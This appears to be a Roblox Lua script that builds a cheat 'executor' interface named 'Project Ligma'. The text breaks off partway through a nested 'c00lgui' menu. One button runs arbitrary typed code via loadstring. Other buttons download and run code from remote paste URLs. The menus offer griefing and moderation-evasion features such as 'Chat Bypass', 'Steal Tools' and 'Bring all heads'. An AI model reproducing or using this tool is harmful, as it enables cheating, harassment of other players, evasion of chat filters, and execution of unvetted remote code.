local ProjectLigma = Instance.new("ScreenGui")
local MainFrame = Instance.new("Frame")
local Input = Instance.new("TextBox")
local Execute = Instance.new("TextButton")
local Scripts = Instance.new("Frame")
local Harked = Instance.new("TextButton")
local RevizAdmin = Instance.new("TextButton")
local c00lgui = Instance.new("TextButton")
local Telekinesis = Instance.new("TextButton")
local IYAdmin = Instance.new("TextButton")
local SnapNeck = Instance.new("TextButton")
local Clear = Instance.new("TextButton")
local Inject = Instance.new("TextButton")
local Frame = Instance.new("Frame")
local Close = Instance.new("TextButton")
local Icon = Instance.new("ImageLabel")
local UICorner = Instance.new("UICorner")
local Text = Instance.new("TextLabel")
local other = Instance.new("Frame")
local Icon_2 = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local Injected = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")

--Properties:

ProjectLigma.Name = "Project Ligma"
ProjectLigma.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ProjectLigma.ResetOnSpawn = false

MainFrame.Name = "MainFrame"
MainFrame.Parent = ProjectLigma
MainFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
MainFrame.Position = UDim2.new(0.127327561, 0, 0.139442205, 0)
MainFrame.Size = UDim2.new(0, 681, 0, 398)

Input.Name = "Input"
Input.Parent = MainFrame
Input.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Input.Position = UDim2.new(0.0108060008, 0, 0.159952745, 0)
Input.Size = UDim2.new(0, 498, 0, 311)
Input.Font = Enum.Font.SourceSans
Input.Text = ""
Input.TextColor3 = Color3.fromRGB(0, 0, 0)
Input.TextSize = 14.000
Input.TextXAlignment = Enum.TextXAlignment.Left
Input.TextYAlignment = Enum.TextYAlignment.Top

Execute.Name = "Execute"
Execute.Parent = MainFrame
Execute.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Execute.Position = UDim2.new(0.74270004, 0, 0.159877107, 0)
Execute.Size = UDim2.new(0, 51, 0, 106)
Execute.Font = Enum.Font.SourceSans
Execute.Text = "EXE"
Execute.TextColor3 = Color3.fromRGB(0, 0, 0)
Execute.TextSize = 14.000

Scripts.Name = "Scripts"
Scripts.Parent = MainFrame
Scripts.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Scripts.Position = UDim2.new(0.836608231, 0, 0.159883812, 0)
Scripts.Size = UDim2.new(0, 104, 0, 311)

Harked.Name = "Harked"
Harked.Parent = Scripts
Harked.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Harked.Size = UDim2.new(0, 104, 0, 30)
Harked.Font = Enum.Font.SourceSans
Harked.Text = "Harked"
Harked.TextColor3 = Color3.fromRGB(0, 0, 0)
Harked.TextSize = 14.000

RevizAdmin.Name = "Reviz Admin"
RevizAdmin.Parent = Scripts
RevizAdmin.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
RevizAdmin.Position = UDim2.new(0, 0, 0.0958339274, 0)
RevizAdmin.Size = UDim2.new(0, 104, 0, 30)
RevizAdmin.Font = Enum.Font.SourceSans
RevizAdmin.Text = "Reviz Admin"
RevizAdmin.TextColor3 = Color3.fromRGB(0, 0, 0)
RevizAdmin.TextSize = 14.000

c00lgui.Name = "c00lgui"
c00lgui.Parent = Scripts
c00lgui.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
c00lgui.Position = UDim2.new(0, 0, 0.192296952, 0)
c00lgui.Size = UDim2.new(0, 104, 0, 30)
c00lgui.Font = Enum.Font.SourceSans
c00lgui.Text = "c00lgui"
c00lgui.TextColor3 = Color3.fromRGB(0, 0, 0)
c00lgui.TextSize = 14.000

Telekinesis.Name = "Telekinesis"
Telekinesis.Parent = Scripts
Telekinesis.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Telekinesis.Position = UDim2.new(0, 0, 0.288759977, 0)
Telekinesis.Size = UDim2.new(0, 104, 0, 30)
Telekinesis.Font = Enum.Font.SourceSans
Telekinesis.Text = "Telekinesis"
Telekinesis.TextColor3 = Color3.fromRGB(0, 0, 0)
Telekinesis.TextSize = 14.000

IYAdmin.Name = "IY Admin"
IYAdmin.Parent = Scripts
IYAdmin.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
IYAdmin.Position = UDim2.new(0, 0, 0.385223001, 0)
IYAdmin.Size = UDim2.new(0, 104, 0, 30)
IYAdmin.Font = Enum.Font.SourceSans
IYAdmin.Text = "IY Admin"
IYAdmin.TextColor3 = Color3.fromRGB(0, 0, 0)
IYAdmin.TextSize = 14.000

SnapNeck.Name = "Snap Neck"
SnapNeck.Parent = Scripts
SnapNeck.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
SnapNeck.Position = UDim2.new(0, 0, 0.481686026, 0)
SnapNeck.Size = UDim2.new(0, 104, 0, 30)
SnapNeck.Font = Enum.Font.SourceSans
SnapNeck.Text = "Snap Neck"
SnapNeck.TextColor3 = Color3.fromRGB(0, 0, 0)
SnapNeck.TextSize = 14.000

Clear.Name = "Clear"
Clear.Parent = MainFrame
Clear.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Clear.Position = UDim2.new(0.74270004, 0, 0.424858063, 0)
Clear.Size = UDim2.new(0, 51, 0, 103)
Clear.Font = Enum.Font.SourceSans
Clear.Text = "CLEAR"
Clear.TextColor3 = Color3.fromRGB(0, 0, 0)
Clear.TextSize = 14.000

Inject.Name = "Inject"
Inject.Parent = MainFrame
Inject.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Inject.Position = UDim2.new(0.74270004, 0, 0.683652043, 0)
Inject.Size = UDim2.new(0, 51, 0, 103)
Inject.Font = Enum.Font.SourceSans
Inject.Text = "INJECT"
Inject.TextColor3 = Color3.fromRGB(0, 0, 0)
Inject.TextSize = 14.000

Frame.Parent = MainFrame
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.Size = UDim2.new(0, 681, 0, 43)

Close.Name = "Close"
Close.Parent = Frame
Close.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Close.BackgroundTransparency = 1.000
Close.BorderColor3 = Color3.fromRGB(255, 255, 255)
Close.Position = UDim2.new(0.941221952, 0, 0.0232558139, 0)
Close.Size = UDim2.new(0, 40, 0, 42)
Close.Font = Enum.Font.SourceSans
Close.Text = "X"
Close.TextColor3 = Color3.fromRGB(0, 0, 0)
Close.TextSize = 20.000

Icon.Name = "Icon"
Icon.Parent = Frame
Icon.BackgroundColor3 = Color3.fromRGB(6, 6, 6)
Icon.BorderColor3 = Color3.fromRGB(0, 0, 0)
Icon.Position = UDim2.new(0.0108060008, 0, 0.143165052, 0)
Icon.Size = UDim2.new(0, 30, 0, 30)
Icon.Image = "http://www.roblox.com/asset/?id=915826895"

UICorner.CornerRadius = UDim.new(8, 8)
UICorner.Parent = Icon

Text.Name = "Text"
Text.Parent = Frame
Text.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Text.BackgroundTransparency = 1.000
Text.Position = UDim2.new(-0.0482101627, 0, -0.358882427, 0)
Text.Size = UDim2.new(0, 200, 0, 72)
Text.Font = Enum.Font.SourceSans
Text.Text = "Ligma"
Text.TextColor3 = Color3.fromRGB(0, 0, 0)
Text.TextSize = 20.000
Text.TextWrapped = true

other.Name = "other"
other.Parent = ProjectLigma
other.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
other.BackgroundTransparency = 1.000
other.Position = UDim2.new(0.0248493981, 0, 0.782716036, 0)
other.Size = UDim2.new(0, 100, 0, 100)

Icon_2.Name = "Icon"
Icon_2.Parent = other
Icon_2.BackgroundColor3 = Color3.fromRGB(107, 107, 107)
Icon_2.BackgroundTransparency = 1.000
Icon_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Icon_2.Position = UDim2.new(0.0581253059, 0, -0.091632694, 0)
Icon_2.Size = UDim2.new(0, 84, 0, 89)
Icon_2.Image = "http://www.roblox.com/asset/?id=11319148738"

TextLabel.Parent = other
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.Position = UDim2.new(0.897891521, 0, -0.091632694, 0)
TextLabel.Size = UDim2.new(0, 277, 0, 89)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = ""
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 14.000
TextLabel.TextYAlignment = Enum.TextYAlignment.Top

TextLabel_2.Parent = other
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.Position = UDim2.new(0.957891524, 0, 0.228367329, 0)
TextLabel_2.Size = UDim2.new(0, 265, 0, 69)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Run scripts with project ligma!"
TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.TextSize = 20.000
TextLabel_2.TextYAlignment = Enum.TextYAlignment.Top

Injected.Name = "Injected"
Injected.Parent = other
Injected.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Injected.BackgroundTransparency = 1.000
Injected.BorderColor3 = Color3.fromRGB(255, 255, 255)
Injected.Position = UDim2.new(0.957891524, 0, 0.458367318, 0)
Injected.Size = UDim2.new(0, 265, 0, 74)
Injected.Font = Enum.Font.SourceSans
Injected.Text = "Status : Not Injected"
Injected.TextColor3 = Color3.fromRGB(0, 0, 0)
Injected.TextSize = 20.000
Injected.TextYAlignment = Enum.TextYAlignment.Top

TextLabel_3.Parent = other
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.Position = UDim2.new(0.957891524, 0, 0.00836732984, 0)
TextLabel_3.Size = UDim2.new(0, 265, 0, 69)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Project Ligma by rusello25"
TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.TextSize = 20.000
TextLabel_3.TextYAlignment = Enum.TextYAlignment.Top

-- Scripts:

local function TSDKKQJ_fake_script() -- Execute.Script 
	local script = Instance.new('Script', Execute)

	script.Parent.MouseButton1Click:Connect(function()
		assert(loadstring(script.Parent.Parent.Input.Text))()
	end)
end
coroutine.wrap(TSDKKQJ_fake_script)()
local function BYPOM_fake_script() -- Harked.Script 
	local script = Instance.new('Script', Harked)

	script.Parent.MouseButton1Down:connect(function()
		loadstring(game:HttpGet("https://www.klgrth.io/paste/q8pr8/raw", true))()
	end)
end
coroutine.wrap(BYPOM_fake_script)()
local function JJNL_fake_script() -- RevizAdmin.Script 
	local script = Instance.new('Script', RevizAdmin)

	script.Parent.MouseButton1Down:connect(function()
		loadstring(game:HttpGet(('https://www.klgrth.io/paste/a44n9/raw'),true))()
	end)
end
coroutine.wrap(JJNL_fake_script)()
local function VPJFTO_fake_script() -- c00lgui.Script 
	local script = Instance.new('Script', c00lgui)

	script.Parent.MouseButton1Down:connect(function()
		local culgui = Instance.new("ScreenGui")
		local Frame = Instance.new("Frame")
		local Page1 = Instance.new("Frame")
		local AdminCommandsGuis = Instance.new("Frame")
		local Harked = Instance.new("TextButton")
		local ProjectLigma = Instance.new("TextButton")
		local T0PK3K = Instance.new("TextButton")
		local ByteGui = Instance.new("TextButton")
		local RevizAdminV3 = Instance.new("TextButton")
		local InfiniteYield = Instance.new("TextButton")
		local FatesAdmin = Instance.new("TextButton")
		local UnanchoredGui = Instance.new("TextButton")
		local ChatHaxx = Instance.new("TextButton")
		local PendulumHub = Instance.new("TextButton")
		local Hydroxide = Instance.new("TextButton")
		local Opfinality = Instance.new("TextButton")
		local Title = Instance.new("TextLabel")
		local Homebrewadmin = Instance.new("TextButton")
		local CMDX = Instance.new("TextButton")
		local Scripts = Instance.new("Frame")
		local Bringallplayersheads = Instance.new("TextButton")
		local singc00lkiddtheme = Instance.new("TextButton")
		local Platform = Instance.new("TextButton")
		local HeadFling = Instance.new("TextButton")
		local ChatBypass = Instance.new("TextButton")
		local FloatingPad = Instance.new("TextButton")
		local HeadShake = Instance.new("TextButton")
		local NameTag = Instance.new("TextButton")
		local ControlNPCs = Instance.new("TextButton")
		local Getallitems = Instance.new("TextButton")
		local Blackhole = Instance.new("TextButton")
		local WalkOnWalls = Instance.new("TextButton")
		local Title_2 = Instance.new("TextLabel")
		local SCP173 = Instance.new("TextButton")
		local SCP106 = Instance.new("TextButton")
		local Title_3 = Instance.new("TextLabel")
		local Settings = Instance.new("Frame")
		local Page1_2 = Instance.new("Frame")
		local Walkspeed = Instance.new("Frame")
		local TextBox = Instance.new("TextBox")
		local Title_4 = Instance.new("TextLabel")
		local TextButton = Instance.new("TextButton")
		local God = Instance.new("Frame")
		local TextButton_2 = Instance.new("TextButton")
		local Title_5 = Instance.new("TextLabel")
		local Invisibility = Instance.new("Frame")
		local TextButton_3 = Instance.new("TextButton")
		local Title_6 = Instance.new("TextLabel")
		local JumpPower = Instance.new("Frame")
		local TextBox_2 = Instance.new("TextBox")
		local Title_7 = Instance.new("TextLabel")
		local TextButton_4 = Instance.new("TextButton")
		local Title_8 = Instance.new("TextLabel")
		local Netless = Instance.new("Frame")
		local TextButton_5 = Instance.new("TextButton")
		local Title_9 = Instance.new("TextLabel")
		local c00lguireawakened = Instance.new("Frame")
		local TextButton_6 = Instance.new("TextButton")
		local Title_10 = Instance.new("TextLabel")
		local TextButton_7 = Instance.new("TextButton")
		local TextButton_8 = Instance.new("TextButton")
		local Title_11 = Instance.new("TextLabel")
		local Credits = Instance.new("TextButton")
		local idk = Instance.new("TextButton")
		local Next = Instance.new("TextButton")
		local Previous = Instance.new("TextButton")
		local Title_12 = Instance.new("TextLabel")
		local Page2 = Instance.new("Frame")
		local GearTools = Instance.new("Frame")
		local SuicideGun = Instance.new("TextButton")
		local GravityGun = Instance.new("TextButton")
		local StealTools = Instance.new("TextButton")
		local DevUzi = Instance.new("TextButton")
		local M4Carbine = Instance.new("TextButton")
		local Uzi = Instance.new("TextButton")
		local AK47 = Instance.new("TextButton")
		local M3GreaseGun = Instance.new("TextButton")
		local Empty = Instance.new("TextButton")
		local Empty_2 = Instance.new("TextButton")
		local Empty_3 = Instance.new("TextButton")
		local Empty_4 = Instance.new("TextButton")
		local Title_13 = Instance.new("TextLabel")
		local Empty_5 = Instance.new("TextButton")
		local Empty_6 = Instance.new("TextButton")
		local WeaponScripts = Instance.new("Frame")
		local ElioBlasio = Instance.new("TextButton")
		local TrueSSHub = Instance.new("TextButton")
		local Sledgehammer = Instance.new("TextButton")
		local SwatBanisher = Instance.new("TextButton")
		local NullwareHub = Instance.new("TextButton")
		local PunchScript = Instance.new("TextButton")
		local _500PoundsBall = Instance.new("TextButton")
		local GKV3 = Instance.new("TextButton")
		local GrabKnifeV4 = Instance.new("TextButton")
		local GermanSoldier = Instance.new("TextButton")
		local Empty_7 = Instance.new("TextButton")
		local Empty_8 = Instance.new("TextButton")
		local Empty_9 = Instance.new("TextButton")
		local Empty_10 = Instance.new("TextButton")
		local Title_14 = Instance.new("TextLabel")
		local Title_15 = Instance.new("TextLabel")
		local cool = Instance.new("Frame")
		local idk_2 = Instance.new("TextButton")
		local CloseOpen = Instance.new("TextButton")
	
		--Properties:
	
		culgui.Name = "culgui"
		culgui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
		culgui.ResetOnSpawn = false
	
		Frame.Parent = culgui
		Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Frame.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Frame.BorderSizePixel = 3
		Frame.Position = UDim2.new(0, 3, 0.300000012, 0)
		Frame.Size = UDim2.new(0, 300, 0, 400)
	
		Page1.Name = "Page1"
		Page1.Parent = Frame
		Page1.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Page1.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Page1.BorderSizePixel = 3
		Page1.Position = UDim2.new(0, 0, 0, 83)
		Page1.Size = UDim2.new(1, 0, 1, -106)
		Page1.ZIndex = 2
	
		AdminCommandsGuis.Name = "Admin Commands/Guis"
		AdminCommandsGuis.Parent = Page1
		AdminCommandsGuis.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		AdminCommandsGuis.BorderColor3 = Color3.fromRGB(255, 0, 0)
		AdminCommandsGuis.BorderSizePixel = 3
		AdminCommandsGuis.Position = UDim2.new(0.5, 3, 0, 0)
		AdminCommandsGuis.Size = UDim2.new(0.5, -3, 1, 0)
		AdminCommandsGuis.ZIndex = 2
	
		Harked.Name = "Harked"
		Harked.Parent = AdminCommandsGuis
		Harked.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Harked.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Harked.BorderSizePixel = 3
		Harked.Position = UDim2.new(0, 0, 0, 33)
		Harked.Size = UDim2.new(0.5, 0, 0, 30)
		Harked.ZIndex = 2
		Harked.Font = Enum.Font.SourceSans
		Harked.Text = "Harked"
		Harked.TextColor3 = Color3.fromRGB(255, 255, 255)
		Harked.TextSize = 14.000
	
		ProjectLigma.Name = "Project Ligma"
		ProjectLigma.Parent = AdminCommandsGuis
		ProjectLigma.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		ProjectLigma.BorderColor3 = Color3.fromRGB(255, 0, 0)
		ProjectLigma.BorderSizePixel = 3
		ProjectLigma.Position = UDim2.new(0.5, 3, 0, 33)
		ProjectLigma.Size = UDim2.new(0.5, -3, 0, 30)
		ProjectLigma.ZIndex = 2
		ProjectLigma.Font = Enum.Font.SourceSans
		ProjectLigma.Text = "Project Ligma"
		ProjectLigma.TextColor3 = Color3.fromRGB(255, 255, 255)
		ProjectLigma.TextSize = 14.000
		ProjectLigma.TextWrapped = true
	
		T0PK3K.Name = "T0PK3K"
		T0PK3K.Parent = AdminCommandsGuis
		T0PK3K.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		T0PK3K.BorderColor3 = Color3.fromRGB(255, 0, 0)
		T0PK3K.BorderSizePixel = 3
		T0PK3K.Position = UDim2.new(0, 0, 0, 66)
		T0PK3K.Size = UDim2.new(0.5, 0, 0, 30)
		T0PK3K.ZIndex = 2
		T0PK3K.Font = Enum.Font.SourceSans
		T0PK3K.Text = "T0PK3K"
		T0PK3K.TextColor3 = Color3.fromRGB(255, 255, 255)
		T0PK3K.TextSize = 14.000
		T0PK3K.TextWrapped = true
	
		ByteGui.Name = "ByteGui"
		ByteGui.Parent = AdminCommandsGuis
		ByteGui.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		ByteGui.BorderColor3 = Color3.fromRGB(255, 0, 0)
		ByteGui.BorderSizePixel = 3
		ByteGui.Position = UDim2.new(0.5, 3, 0, 66)
		ByteGui.Size = UDim2.new(0.5, -3, 0, 30)
		ByteGui.ZIndex = 2
		ByteGui.Font = Enum.Font.SourceSans
		ByteGui.Text = "ByteGui"
		ByteGui.TextColor3 = Color3.fromRGB(255, 255, 255)
		ByteGui.TextSize = 14.000
	
		RevizAdminV3.Name = "Reviz Admin V3"
		RevizAdminV3.Parent = AdminCommandsGuis
		RevizAdminV3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		RevizAdminV3.BorderColor3 = Color3.fromRGB(255, 0, 0)
		RevizAdminV3.BorderSizePixel = 3
		RevizAdminV3.Position = UDim2.new(0, 0, 0, 99)
		RevizAdminV3.Size = UDim2.new(0.5, 0, 0, 30)
		RevizAdminV3.ZIndex = 2
		RevizAdminV3.Font = Enum.Font.SourceSans
		RevizAdminV3.Text = "Reviz Admin"
		RevizAdminV3.TextColor3 = Color3.fromRGB(255, 255, 255)
		RevizAdminV3.TextSize = 14.000
	
		InfiniteYield.Name = "Infinite Yield"
		InfiniteYield.Parent = AdminCommandsGuis
		InfiniteYield.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		InfiniteYield.BorderColor3 = Color3.fromRGB(255, 0, 0)
		InfiniteYield.BorderSizePixel = 3
		InfiniteYield.Position = UDim2.new(0.5, 3, 0, 99)
		InfiniteYield.Size = UDim2.new(0.5, -3, 0, 30)
		InfiniteYield.ZIndex = 2
		InfiniteYield.Font = Enum.Font.SourceSans
		InfiniteYield.Text = "Infinite Yield"
		InfiniteYield.TextColor3 = Color3.fromRGB(255, 255, 255)
		InfiniteYield.TextSize = 14.000
		InfiniteYield.TextWrapped = true
	
		FatesAdmin.Name = "Fates Admin"
		FatesAdmin.Parent = AdminCommandsGuis
		FatesAdmin.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		FatesAdmin.BorderColor3 = Color3.fromRGB(255, 0, 0)
		FatesAdmin.BorderSizePixel = 3
		FatesAdmin.Position = UDim2.new(0, 0, 0, 132)
		FatesAdmin.Size = UDim2.new(0.5, 0, 0, 30)
		FatesAdmin.ZIndex = 2
		FatesAdmin.Font = Enum.Font.SourceSans
		FatesAdmin.Text = "Fates Admin"
		FatesAdmin.TextColor3 = Color3.fromRGB(255, 255, 255)
		FatesAdmin.TextSize = 14.000
	
		UnanchoredGui.Name = "Unanchored Gui"
		UnanchoredGui.Parent = AdminCommandsGuis
		UnanchoredGui.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		UnanchoredGui.BorderColor3 = Color3.fromRGB(255, 0, 0)
		UnanchoredGui.BorderSizePixel = 3
		UnanchoredGui.Position = UDim2.new(0.5, 3, 0, 132)
		UnanchoredGui.Size = UDim2.new(0.5, -3, 0, 30)
		UnanchoredGui.ZIndex = 2
		UnanchoredGui.Font = Enum.Font.SourceSans
		UnanchoredGui.Text = "Unanchored Gui"
		UnanchoredGui.TextColor3 = Color3.fromRGB(255, 255, 255)
		UnanchoredGui.TextSize = 14.000
		UnanchoredGui.TextWrapped = true
	
		ChatHaxx.Name = "ChatHaxx"
		ChatHaxx.Parent = AdminCommandsGuis
		ChatHaxx.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		ChatHaxx.BorderColor3 = Color3.fromRGB(255, 0, 0)
		ChatHaxx.BorderSizePixel = 3
		ChatHaxx.Position = UDim2.new(0, 0, 0, 165)
		ChatHaxx.Size = UDim2.new(0.499000013, 0, 0, 30)
		ChatHaxx.ZIndex = 2
		ChatHaxx.Font = Enum.Font.SourceSans
		ChatHaxx.Text = "ChatHaxx"
		ChatHaxx.TextColor3 = Color3.fromRGB(255, 255, 255)
		ChatHaxx.TextSize = 14.000
	
		PendulumHub.Name = "Pendulum Hub"
		PendulumHub.Parent = AdminCommandsGuis
		PendulumHub.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		PendulumHub.BorderColor3 = Color3.fromRGB(255, 0, 0)
		PendulumHub.BorderSizePixel = 3
		PendulumHub.Position = UDim2.new(0.5, 3, 0, 165)
		PendulumHub.Size = UDim2.new(0.5, -3, 0, 30)
		PendulumHub.ZIndex = 2
		PendulumHub.Font = Enum.Font.SourceSans
		PendulumHub.Text = "Pendulum"
		PendulumHub.TextColor3 = Color3.fromRGB(255, 255, 255)
		PendulumHub.TextSize = 14.000
	
		Hydroxide.Name = "Hydroxide"
		Hydroxide.Parent = AdminCommandsGuis
		Hydroxide.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Hydroxide.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Hydroxide.BorderSizePixel = 3
		Hydroxide.Position = UDim2.new(0, 0, 0, 198)
		Hydroxide.Size = UDim2.new(0.499000013, 0, 0, 30)
		Hydroxide.ZIndex = 3
		Hydroxide.Font = Enum.Font.SourceSans
		Hydroxide.Text = "Hydroxide"
		Hydroxide.TextColor3 = Color3.fromRGB(255, 255, 255)
		Hydroxide.TextSize = 14.000
		Hydroxide.TextWrapped = true
	
		Opfinality.Name = "Opfinality"
		Opfinality.Parent = AdminCommandsGuis
		Opfinality.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Opfinality.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Opfinality.BorderSizePixel = 3
		Opfinality.Position = UDim2.new(0.5, 3, 0, 198)
		Opfinality.Size = UDim2.new(0.5, -3, 0, 30)
		Opfinality.ZIndex = 2
		Opfinality.Font = Enum.Font.SourceSans
		Opfinality.Text = "Opfinality"
		Opfinality.TextColor3 = Color3.fromRGB(255, 255, 255)
		Opfinality.TextSize = 14.000
	
		Title.Name = "Title"
		Title.Parent = AdminCommandsGuis
		Title.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Title.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Title.BorderSizePixel = 3
		Title.Size = UDim2.new(1, 0, 0, 30)
		Title.ZIndex = 2
		Title.Font = Enum.Font.SourceSansBold
		Title.Text = "Admin Commands/Guis"
		Title.TextColor3 = Color3.fromRGB(255, 255, 255)
		Title.TextSize = 14.000
	
		Homebrewadmin.Name = "Homebrew admin"
		Homebrewadmin.Parent = AdminCommandsGuis
		Homebrewadmin.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Homebrewadmin.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Homebrewadmin.BorderSizePixel = 3
		Homebrewadmin.Position = UDim2.new(0, 0, 0, 228)
		Homebrewadmin.Size = UDim2.new(0.499000013, 0, 0, 30)
		Homebrewadmin.ZIndex = 3
		Homebrewadmin.Font = Enum.Font.SourceSans
		Homebrewadmin.Text = "Homebrew Admin"
		Homebrewadmin.TextColor3 = Color3.fromRGB(255, 255, 255)
		Homebrewadmin.TextSize = 14.000
		Homebrewadmin.TextWrapped = true
	
		CMDX.Name = "CMD-X"
		CMDX.Parent = AdminCommandsGuis
		CMDX.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		CMDX.BorderColor3 = Color3.fromRGB(255, 0, 0)
		CMDX.BorderSizePixel = 3
		CMDX.Position = UDim2.new(0.5, 3, 0.10204082, 198)
		CMDX.Size = UDim2.new(0.5, -3, 0, 30)
		CMDX.ZIndex = 2
		CMDX.Font = Enum.Font.SourceSans
		CMDX.Text = "CMD-X"
		CMDX.TextColor3 = Color3.fromRGB(255, 255, 255)
		CMDX.TextSize = 14.000
	
		Scripts.Name = "Scripts"
		Scripts.Parent = Page1
		Scripts.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Scripts.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Scripts.BorderSizePixel = 3
		Scripts.Size = UDim2.new(0.5, -3, 1, 0)
		Scripts.ZIndex = 2
	
		Bringallplayersheads.Name = "Bring all player's heads"
		Bringallplayersheads.Parent = Scripts
		Bringallplayersheads.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Bringallplayersheads.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Bringallplayersheads.BorderSizePixel = 3
		Bringallplayersheads.Position = UDim2.new(0, 0, 0, 33)
		Bringallplayersheads.Size = UDim2.new(0.5, 0, 0, 30)
		Bringallplayersheads.ZIndex = 2
		Bringallplayersheads.Font = Enum.Font.SourceSans
		Bringallplayersheads.Text = "Bring all head"
		Bringallplayersheads.TextColor3 = Color3.fromRGB(255, 255, 255)
		Bringallplayersheads.TextSize = 14.000
	
		singc00lkiddtheme.Name = "sing c00lkidd theme"
		singc00lkiddtheme.Parent = Scripts
		singc00lkiddtheme.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		singc00lkiddtheme.BorderColor3 = Color3.fromRGB(255, 0, 0)
		singc00lkiddtheme.BorderSizePixel = 3
		singc00lkiddtheme.Position = UDim2.new(0.5, 3, 0, 33)
		singc00lkiddtheme.Size = UDim2.new(0.5, -3, 0, 30)
		singc00lkiddtheme.ZIndex = 2
		singc00lkiddtheme.Font = Enum.Font.SourceSans
		singc00lkiddtheme.Text = "sing c00lkidd theme"
		singc00lkiddtheme.TextColor3 = Color3.fromRGB(255, 255, 255)
		singc00lkiddtheme.TextSize = 14.000
		singc00lkiddtheme.TextWrapped = true
	
		Platform.Name = "Platform"
		Platform.Parent = Scripts
		Platform.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		Platform.BorderColor3 = Color3.fromRGB(255, 0, 0)
		Platform.BorderSizePixel = 3
		Platform.Position = UDim2.new(0, 0, 0, 66)
		Platform.Size = UDim2.new(0.5, 0, 0, 30)
		Platform.ZIndex = 2
		Platform.Font = Enum.Font.SourceSans
		Platform.Text = "Platform"
		Platform.TextColor3 = Color3.fromRGB(255, 255, 255)
		Platform.TextSize = 14.000
		Platform.TextWrapped = true
	
		HeadFling.Name = "Head Fling"
		HeadFling.Parent = Scripts
		HeadFling.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		HeadFling.BorderColor3 = Color3.fromRGB(255, 0, 0)
		HeadFling.BorderSizePixel = 3
		HeadFling.Position = UDim2.new(0.5, 3, 0, 66)
		HeadFling.Size = UDim2.new(0.5, -3, 0, 30)
		HeadFling.ZIndex = 2
		HeadFling.Font = Enum.Font.SourceSans
		HeadFling.Text = "Head Fling"
		HeadFling.TextColor3 = Color3.fromRGB(255, 255, 255)
		HeadFling.TextSize = 14.000
		HeadFling.TextWrapped = true
	
		ChatBypass.Name = "Chat Bypass"
		ChatBypass.Parent = Scripts
		ChatBypass.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		ChatBypass.BorderColor3 = Color3.fromRGB(255, 0, 0)
		ChatBypass.BorderSizePixel = 3
		ChatBypass.Position = UDim2.new(0, 0, 0, 99)
		ChatBypass.Size = UDim2.new(0.499000013, 0, 0, 30)
		ChatBypass.ZIndex = 2
		ChatBypass.Font = Enum.Font.SourceSans
		ChatBypass.Text = "Chat Bypass"
		ChatBypass.TextColor3 = Color3.fromRGB(255, 255, 255)
		ChatBypass.TextSize = 14.000
		ChatBypass.TextWrapped = true
	
		FloatingPad.Name = "Floating Pad"
		FloatingPad.Parent = Scripts
